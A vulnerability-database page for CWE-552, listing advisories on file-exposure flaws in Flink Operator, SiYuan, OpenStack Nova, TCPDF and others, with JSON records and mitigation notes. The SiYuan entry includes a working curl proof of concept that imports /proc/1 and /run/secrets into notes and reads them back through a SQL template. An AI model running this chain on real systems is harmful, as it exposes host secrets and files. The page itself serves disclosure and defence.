CWE-552
AllowedFiles or Directories Accessible to External Parties
Abstraction: Base · Status: Draft
The product makes files or directories accessible to unauthorized actors, even though they should not be.
669 vulnerabilities reference this CWE, most recent first.
GHSA-RJ6X-MG28-WF4X
Vulnerability from github – Published: 2026-05-26 18:31 – Updated: 2026-06-01 15:30Files or Directories Accessible to External Parties, Server-Side Request Forgery (SSRF) vulnerability in Apache Flink Kubernetes Operator.
The FlinkSessionJob jarURI is currently not validated so that it points to user-owned files or addresses. This lets a user with CR create permissions read files from the operator pod's filesystem and pull content from any backing store reachable through Flink's pluggable filesystem layer and access them through the submitted Flink job. Furthermore for fetching from http/https addresses there is currently no allowlist on the URI scheme, no host check, no IP-range restriction, and no protection against pointing the URI at internal or link-local addresses.This issue affects Apache Flink Kubernetes Operator: from 1.3.0 before 1.15.0.
Users are recommended to upgrade to version 1.15.0, which fixes the issue.
{
"affected": [],
"aliases": [
"CVE-2026-40564"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-05-26T16:16:24Z",
"severity": "MODERATE"
},
"details": "Files or Directories Accessible to External Parties, Server-Side Request Forgery (SSRF) vulnerability in Apache Flink Kubernetes Operator.\n\nThe FlinkSessionJob jarURI is currently not validated so that it points to user-owned files or addresses.\u00a0\u00a0This lets a user with CR create permissions read files from the operator pod\u0027s filesystem and pull content from any backing store reachable through Flink\u0027s pluggable filesystem layer and access them through the submitted Flink job. Furthermore for fetching from http/https addresses\u00a0there is currently no allowlist on the URI scheme, no host check, no IP-range restriction, and no protection against pointing the URI at internal or link-local addresses.This issue affects Apache Flink Kubernetes Operator: from 1.3.0 before 1.15.0.\n\nUsers are recommended to upgrade to version 1.15.0, which fixes the issue.",
"id": "GHSA-rj6x-mg28-wf4x",
"modified": "2026-06-01T15:30:34Z",
"published": "2026-05-26T18:31:43Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40564"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/jvxs2kh2o60sl7qkl5nss4r5phzfl4cz"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2026/05/26/6"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RJCH-HJ8F-VM5C
Vulnerability from github – Published: 2022-05-24 16:58 – Updated: 2024-04-04 02:13An issue was discovered in Zoho ManageEngine DataSecurity Plus before 5.0.1 5012. An exposed service allows a basic user ("Operator" access level) to access the configuration file of the mail server (except for the password).
{
"affected": [],
"aliases": [
"CVE-2019-17112"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2019-10-09T20:15:00Z",
"severity": "MODERATE"
},
"details": "An issue was discovered in Zoho ManageEngine DataSecurity Plus before 5.0.1 5012. An exposed service allows a basic user (\"Operator\" access level) to access the configuration file of the mail server (except for the password).",
"id": "GHSA-rjch-hj8f-vm5c",
"modified": "2024-04-04T02:13:15Z",
"published": "2022-05-24T16:58:18Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2019-17112"
},
{
"type": "WEB",
"url": "https://excellium-services.com/cert-xlm-advisory/cve-2019-17112"
},
{
"type": "WEB",
"url": "https://www.manageengine.com/data-security/release-notes.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RJHH-M223-9QQV
Vulnerability from github – Published: 2026-03-16 18:47 – Updated: 2026-03-30 13:58Summary
POST /api/import/importStdMd passes the localPath parameter directly to model.ImportFromLocalPath with zero path validation. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users.
Details
File: kernel/api/import.go - function importStdMd
func importStdMd(c *gin.Context) {
notebook := arg["notebook"].(string)
localPath := arg["localPath"].(string)
toPath := arg["toPath"].(string)
err := model.ImportFromLocalPath(notebook, localPath, toPath)
}
model.ImportFromLocalPath (kernel/model/import.go:784):
func ImportFromLocalPath(boxID, localPath string, toPath string) (err error) {
filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error {
})
}
Unlike globalCopyFiles, there is no blocklist at all. Any readable path is accepted. The imported content is permanently stored in the workspace SQLite database and survives restarts.
Chained attack with Bug #1 (renderSprig): Admin imports sensitive files --> content stored in blocks table --> non-admin user queries via querySQL through renderSprig.
PoC
docker run -d --name siyuan -p 6806:6806 \
-v $(pwd)/workspace:/siyuan/workspace \
b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123
Exploit:
TOKEN="YOUR_ADMIN_TOKEN"
NOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook \
-H "Authorization: Token $TOKEN" -H "Content-Type: application/json" \
-d '{"name":"Exfil"}' | python3 -c "import sys,json; print(json.load(sys.stdin)['data']['notebook']['id'])")
curl -s -X POST http://localhost:6806/api/import/importStdMd \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/proc/1\",\"toPath\":\"/\"}"
curl -s -X POST http://localhost:6806/api/import/importStdMd \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d "{\"notebook\":\"$NOTEBOOK\",\"localPath\":\"/run/secrets\",\"toPath\":\"/\"}"
curl -s -X POST http://localhost:6806/api/template/renderSprig \
-H "Authorization: Token $TOKEN" \
-H "Content-Type: application/json" \
-d '{"template":"{{range $r := (querySQL \"SELECT content FROM blocks LIMIT 50\")}}{{$r.content}}\n---\n{{end}}"}'
Impact
An admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike globalCopyFiles, there is no blocklist - /proc/, /etc/, /run/secrets/, /home/ are all accepted.
Data persists in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the renderSprig SQL injection ( separate advisory ), a non-admin user can then read all imported secrets without any additional privileges.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/siyuan-note/siyuan"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "0.0.0-20260313024916-fd6526133bb3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-32750"
],
"database_specific": {
"cwe_ids": [
"CWE-22",
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-16T18:47:22Z",
"nvd_published_at": "2026-03-19T22:16:41Z",
"severity": "MODERATE"
},
"details": "### Summary\nPOST /api/import/importStdMd passes the localPath parameter directly to model.ImportFromLocalPath with zero path validation. The function recursively reads every file under the given path and permanently stores their content as SiYuan note documents in the workspace database, making them searchable and accessible to all workspace users.\n\n### Details\nFile: kernel/api/import.go - function importStdMd\n\n```go\nfunc importStdMd(c *gin.Context) {\n notebook := arg[\"notebook\"].(string)\n localPath := arg[\"localPath\"].(string)\n toPath := arg[\"toPath\"].(string)\n\n err := model.ImportFromLocalPath(notebook, localPath, toPath)\n}\n```\n\nmodel.ImportFromLocalPath (kernel/model/import.go:784):\n```go\nfunc ImportFromLocalPath(boxID, localPath string, toPath string) (err error) {\n filelock.Walk(localPath, func(currentPath string, d fs.DirEntry, ...) error {\n })\n}\n```\n\nUnlike globalCopyFiles, there is no blocklist at all. Any readable path is accepted. The imported content is permanently stored in the workspace SQLite database and survives restarts.\n\nChained attack with Bug #1 (renderSprig):\nAdmin imports sensitive files --\u003e content stored in blocks table --\u003e non-admin user queries via querySQL through renderSprig.\n\n### PoC\n```bash\ndocker run -d --name siyuan -p 6806:6806 \\\n -v $(pwd)/workspace:/siyuan/workspace \\\n b3log/siyuan --workspace=/siyuan/workspace --accessAuthCode=test123\n```\n\n**Exploit:**\n```bash\nTOKEN=\"YOUR_ADMIN_TOKEN\"\n\nNOTEBOOK=$(curl -s -X POST http://localhost:6806/api/notebook/createNotebook \\\n -H \"Authorization: Token $TOKEN\" -H \"Content-Type: application/json\" \\\n -d \u0027{\"name\":\"Exfil\"}\u0027 | python3 -c \"import sys,json; print(json.load(sys.stdin)[\u0027data\u0027][\u0027notebook\u0027][\u0027id\u0027])\")\n\ncurl -s -X POST http://localhost:6806/api/import/importStdMd \\\n -H \"Authorization: Token $TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \"{\\\"notebook\\\":\\\"$NOTEBOOK\\\",\\\"localPath\\\":\\\"/proc/1\\\",\\\"toPath\\\":\\\"/\\\"}\"\n\ncurl -s -X POST http://localhost:6806/api/import/importStdMd \\\n -H \"Authorization: Token $TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \"{\\\"notebook\\\":\\\"$NOTEBOOK\\\",\\\"localPath\\\":\\\"/run/secrets\\\",\\\"toPath\\\":\\\"/\\\"}\"\n\ncurl -s -X POST http://localhost:6806/api/template/renderSprig \\\n -H \"Authorization: Token $TOKEN\" \\\n -H \"Content-Type: application/json\" \\\n -d \u0027{\"template\":\"{{range $r := (querySQL \\\"SELECT content FROM blocks LIMIT 50\\\")}}{{$r.content}}\\n---\\n{{end}}\"}\u0027\n```\n\n### Impact\nAn admin can permanently import the contents of any readable host directory into the workspace as searchable notes. Unlike globalCopyFiles, there is no blocklist - /proc/, /etc/, /run/secrets/, /home/ are all accepted.\n\nData persists in the workspace database across restarts and is accessible to Publish Service Reader accounts. Combined with the renderSprig SQL injection ( separate advisory ), a non-admin user can then read all imported secrets without any additional privileges.",
"id": "GHSA-rjhh-m223-9qqv",
"modified": "2026-03-30T13:58:39Z",
"published": "2026-03-16T18:47:22Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/security/advisories/GHSA-rjhh-m223-9qqv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32750"
},
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/commit/13b6d3d45e83525654d120f32a3fdc5d9e95df0b"
},
{
"type": "PACKAGE",
"url": "https://github.com/siyuan-note/siyuan"
},
{
"type": "WEB",
"url": "https://github.com/siyuan-note/siyuan/releases/tag/v3.6.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "SiYuan importStdMd: unvalidated localPath imports arbitrary host directories as persistent notes"
}
GHSA-RM86-H44C-2R2M
Vulnerability from github – Published: 2024-07-24 06:31 – Updated: 2025-11-04 19:49In OpenStack Nova before 27.4.1, 28 before 28.2.1, and 29 before 29.1.1, by supplying a raw format image that is actually a crafted QCOW2 image with a backing file path or VMDK flat image with a descriptor file path, an authenticated user may convince systems to return a copy of the referenced file's contents from the server, resulting in unauthorized access to potentially sensitive data. All Nova deployments are affected. NOTE: this issue exists because of an incomplete fix for CVE-2022-47951 and CVE-2024-32498.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "Nova"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "27.4.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "Nova"
},
"ranges": [
{
"events": [
{
"introduced": "28.0.0"
},
{
"last_affected": "28.2.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "Nova"
},
"ranges": [
{
"events": [
{
"introduced": "29.0.0"
},
{
"last_affected": "29.1.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-40767"
],
"database_specific": {
"cwe_ids": [
"CWE-436",
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2024-07-25T14:27:53Z",
"nvd_published_at": "2024-07-24T05:15:12Z",
"severity": "MODERATE"
},
"details": "In OpenStack Nova before 27.4.1, 28 before 28.2.1, and 29 before 29.1.1, by supplying a raw format image that is actually a crafted QCOW2 image with a backing file path or VMDK flat image with a descriptor file path, an authenticated user may convince systems to return a copy of the referenced file\u0027s contents from the server, resulting in unauthorized access to potentially sensitive data. All Nova deployments are affected. NOTE: this issue exists because of an incomplete fix for CVE-2022-47951 and CVE-2024-32498.",
"id": "GHSA-rm86-h44c-2r2m",
"modified": "2025-11-04T19:49:52Z",
"published": "2024-07-24T06:31:10Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-40767"
},
{
"type": "PACKAGE",
"url": "https://github.com/openstack/nova"
},
{
"type": "WEB",
"url": "https://launchpad.net/bugs/2071734"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00017.html"
},
{
"type": "WEB",
"url": "https://review.opendev.org/c/openstack/nova/+/924731"
},
{
"type": "WEB",
"url": "https://security.openstack.org"
},
{
"type": "WEB",
"url": "https://security.openstack.org/ossa/OSSA-2024-002.html"
},
{
"type": "WEB",
"url": "https://www.openwall.com/lists/oss-security/2024/07/23/2"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "OpenStack Nova vulnerable to unauthorized access to potentially sensitive data "
}
GHSA-RMV2-8JJC-23XW
Vulnerability from github – Published: 2024-11-26 18:38 – Updated: 2025-11-03 22:50Local File Inclusion (LFI) vulnerability has been discovered in TCPDF 6.7.5. This vulnerability enables a user to read arbitrary files from the server's file system through src tag, potentially exposing sensitive information.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 6.7.5"
},
"package": {
"ecosystem": "Packagist",
"name": "tecnickcom/tcpdf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.7.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-51058"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": true,
"github_reviewed_at": "2024-11-26T21:54:04Z",
"nvd_published_at": "2024-11-26T18:15:19Z",
"severity": "MODERATE"
},
"details": "Local File Inclusion (LFI) vulnerability has been discovered in TCPDF 6.7.5. This vulnerability enables a user to read arbitrary files from the server\u0027s file system through \u003cimg\u003e src tag, potentially exposing sensitive information.",
"id": "GHSA-rmv2-8jjc-23xw",
"modified": "2025-11-03T22:50:36Z",
"published": "2024-11-26T18:38:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-51058"
},
{
"type": "WEB",
"url": "https://github.com/tecnickcom/TCPDF/commit/bfa7d2b6d455ebf72ebe3d48fbd487ee5a1f6f3b"
},
{
"type": "WEB",
"url": "https://github.com/saravana-hackz/vulnerability-research/tree/main/CVE-2024-51058"
},
{
"type": "PACKAGE",
"url": "https://github.com/tecnickcom/TCPDF"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2025/06/msg00004.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "TCPDF Local File Inclusion vulnerability"
}
GHSA-RPWQ-XW4M-459X
Vulnerability from github – Published: 2023-01-17 03:30 – Updated: 2023-01-25 15:30A vulnerability exists in the FTP server of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0, which processes symbolic links on external storage media. A local authenticated attacker with administrator privileges could abuse this vulnerability to access the root file system by creating a symbolic link on external storage media, such as a USB flash drive, and then logging into the FTP server on a vulnerable device.
{
"affected": [],
"aliases": [
"CVE-2022-45440"
],
"database_specific": {
"cwe_ids": [
"CWE-552",
"CWE-59"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-17T02:15:00Z",
"severity": "MODERATE"
},
"details": "A vulnerability exists in the FTP server of the Zyxel AX7501-B0 firmware prior to V5.17(ABPC.3)C0, which processes symbolic links on external storage media. A local authenticated attacker with administrator privileges could abuse this vulnerability to access the root file system by creating a symbolic link on external storage media, such as a USB flash drive, and then logging into the FTP server on a vulnerable device.",
"id": "GHSA-rpwq-xw4m-459x",
"modified": "2023-01-25T15:30:59Z",
"published": "2023-01-17T03:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-45440"
},
{
"type": "WEB",
"url": "https://www.zyxel.com/global/en/support/security-advisories/zyxel-security-advisory-for-cleartext-storage-of-wifi-credentials-and-improper-symbolic-links-of-ftp-for-ax7501-b0-cpe"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RQ5P-J687-H2VF
Vulnerability from github – Published: 2024-08-22 15:31 – Updated: 2024-08-23 15:30cgi-bin/fdmcgiwebv2.cgi on Swissphone DiCal-RED 4009 devices allows an authenticated attacker to gain access to arbitrary files on the device's file system.
{
"affected": [],
"aliases": [
"CVE-2024-36442"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-08-22T15:15:16Z",
"severity": "HIGH"
},
"details": "cgi-bin/fdmcgiwebv2.cgi on Swissphone DiCal-RED 4009 devices allows an authenticated attacker to gain access to arbitrary files on the device\u0027s file system.",
"id": "GHSA-rq5p-j687-h2vf",
"modified": "2024-08-23T15:30:33Z",
"published": "2024-08-22T15:31:19Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36442"
},
{
"type": "WEB",
"url": "https://www.swissphone.com/en-us/solutions/components/terminals/radio-data-module-dical-red"
},
{
"type": "WEB",
"url": "https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-039.txt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-RR45-4XHX-RXC8
Vulnerability from github – Published: 2022-05-24 17:43 – Updated: 2022-05-24 17:43A flaw was found in ansible-tower. The default installation is vulnerable to Job Isolation escape allowing an attacker to elevate the privilege from a low privileged user to the awx user from outside the isolated environment. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.
{
"affected": [],
"aliases": [
"CVE-2021-20253"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2021-03-09T18:15:00Z",
"severity": "HIGH"
},
"details": "A flaw was found in ansible-tower. The default installation is vulnerable to Job Isolation escape allowing an attacker to elevate the privilege from a low privileged user to the awx user from outside the isolated environment. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
"id": "GHSA-rr45-4xhx-rxc8",
"modified": "2022-05-24T17:43:52Z",
"published": "2022-05-24T17:43:52Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2021-20253"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=1928847"
}
],
"schema_version": "1.4.0",
"severity": []
}
GHSA-RVCJ-88M8-GCJ3
Vulnerability from github – Published: 2022-05-13 01:42 – Updated: 2022-05-13 01:42Microsoft Windows 10 allows an elevation of privilege vulnerability when the Windows Update Delivery Optimization does not properly enforce file share permissions.
{
"affected": [],
"aliases": [
"CVE-2017-11829"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2017-10-13T13:29:00Z",
"severity": "MODERATE"
},
"details": "Microsoft Windows 10 allows an elevation of privilege vulnerability when the Windows Update Delivery Optimization does not properly enforce file share permissions.",
"id": "GHSA-rvcj-88m8-gcj3",
"modified": "2022-05-13T01:42:34Z",
"published": "2022-05-13T01:42:34Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-11829"
},
{
"type": "WEB",
"url": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11829"
},
{
"type": "WEB",
"url": "http://www.securityfocus.com/bid/101213"
},
{
"type": "WEB",
"url": "http://www.securitytracker.com/id/1039526"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-RX6G-PR26-7GXJ
Vulnerability from github – Published: 2024-06-10 21:30 – Updated: 2026-04-02 21:31The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. A maliciously crafted email may be able to initiate FaceTime calls without user authorization.
{
"affected": [],
"aliases": [
"CVE-2024-23282"
],
"database_specific": {
"cwe_ids": [
"CWE-552"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-06-10T21:15:49Z",
"severity": "MODERATE"
},
"details": "The issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.5, watchOS 10.5, iOS 17.5 and iPadOS 17.5, iOS 16.7.8 and iPadOS 16.7.8. A maliciously crafted email may be able to initiate FaceTime calls without user authorization.",
"id": "GHSA-rx6g-pr26-7gxj",
"modified": "2026-04-02T21:31:44Z",
"published": "2024-06-10T21:30:38Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23282"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120898"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120902"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120903"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/120905"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214100"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214101"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214104"
},
{
"type": "WEB",
"url": "https://support.apple.com/en-us/HT214106"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214100"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214101"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214104"
},
{
"type": "WEB",
"url": "https://support.apple.com/kb/HT214106"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N",
"type": "CVSS_V3"
}
]
}
Mitigation
When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to disable public access.
CAPEC-150: Collect Data from Common Resource Locations
An adversary exploits well-known locations for resources for the purposes of undermining the security of the target. In many, if not most systems, files and resources are organized in a default tree structure. This can be useful for adversaries because they often know where to look for resources or files that are necessary for attacks. Even when the precise location of a targeted resource may not be known, naming conventions may indicate a small area of the target machine's file tree where the resources are typically located. For example, configuration files are normally stored in the /etc director on Unix systems. Adversaries can take advantage of this to commit other types of attacks.
CAPEC-639: Probe System Files
An adversary obtains unauthorized information due to improperly protected files. If an application stores sensitive information in a file that is not protected by proper access control, then an adversary can access the file and search for sensitive information.